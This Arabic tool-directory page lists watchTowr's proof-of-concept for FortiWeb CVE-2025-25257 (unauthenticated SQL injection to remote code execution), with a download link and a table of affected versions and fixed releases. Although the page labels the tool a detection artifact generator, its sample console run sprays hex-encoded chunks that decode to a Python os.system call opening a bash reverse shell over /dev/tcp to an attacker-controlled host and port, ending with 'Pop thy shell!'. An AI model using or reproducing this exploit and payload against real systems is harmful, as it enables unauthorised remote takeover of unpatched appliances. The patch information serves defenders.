Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/watchtowrlabs/watchtowr-vs-fortiweb-cve-2025-25257
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubwatchtowrlabs/watchtowr-vs-fortiweb-cve-2025-25257

watchTowr-vs-FortiWeb-CVE-2025-25257

مولد أثر للكشف عن FortiWeb CVE-2025-25257، يستغل ثغرة SQL injection غير مصادق عليها لتحقيق تنفيذ التعليمات البرمجية عن بعد عبر رش الحمولات المشفرة بالنظام الست عشري.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
10024منذ سنة واحدةتمت المراجعة من قبل Kitploit

watchTowr-vs-FortiWeb-CVE-2025-25257

مولد أثر الكشف لـ FortiWeb CVE-2025-25257

انظر منشور مدونتنا للتفاصيل التقنية

https://github.com/user-attachments/assets/e59f2b3b-2b9b-469f-b4a8-2b7df2ede194

الكشف أثناء العمل

root@kitploit:~
python watchTowr-vs-FortiWeb-CVE-2025-25257.py --target https://192.168.8.30/ --lhost 192.168.8.148 --lport 1350
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-FortiWeb-CVE-2025-25257.py

        (*) FortiWeb Unauthenticated SQLi to Remote Code Execution Detection Artifact Generator

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-25257]

[*] sprayed chunk #1/17:        '696d706f72'
[*] sprayed chunk #2/17:        '74206f733b'
[*] sprayed chunk #3/17:        '206f732e73'
[*] sprayed chunk #4/17:        '797374656d'
[*] sprayed chunk #5/17:        '2827626173'
[*] sprayed chunk #6/17:        '68202d6320'
[*] sprayed chunk #7/17:        '222f62696e'
[*] sprayed chunk #8/17:        '2f62617368'
[*] sprayed chunk #9/17:        '202d69203e'
[*] sprayed chunk #10/17:       '26202f6465'
[*] sprayed chunk #11/17:       '762f746370'
[*] sprayed chunk #12/17:       '2f3139322e'
[*] sprayed chunk #13/17:       '3136382e38'
[*] sprayed chunk #14/17:       '2e3134382f'
[*] sprayed chunk #15/17:       '3133353020'
[*] sprayed chunk #16/17:       '303e263122'
[*] sprayed chunk #17/17:       '2729'

[*] Pop thy shell!

الوصف

يحاول هذا البرنامج النصي اكتشاف ما إذا كان FortiWeb عرضة لـ CVE-2025-25257

الإصدارات المتأثرة

الإصدارات التالية من FortiWeb متأثرة

لمزيد من المعلومات، زر FortiGuard Labs PSIRT

تابع مختبرات watchTowr

للحصول على أحدث الأبحاث الأمنية، تابع فريق مختبرات watchTowr

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
تنزيل الأداة
VersionAffectedSolution
FortiWeb 7.67.6.0 حتى 7.6.3الترقية إلى 7.6.4 أو أعلى
FortiWeb 7.47.4.0 حتى 7.4.7الترقية إلى 7.4.8 أو أعلى
FortiWeb 7.27.2.0 حتى 7.2.10الترقية إلى 7.2.11 أو أعلى
FortiWeb 7.07.0.0 حتى 7.0.10الترقية إلى 7.0.11 أو أعلى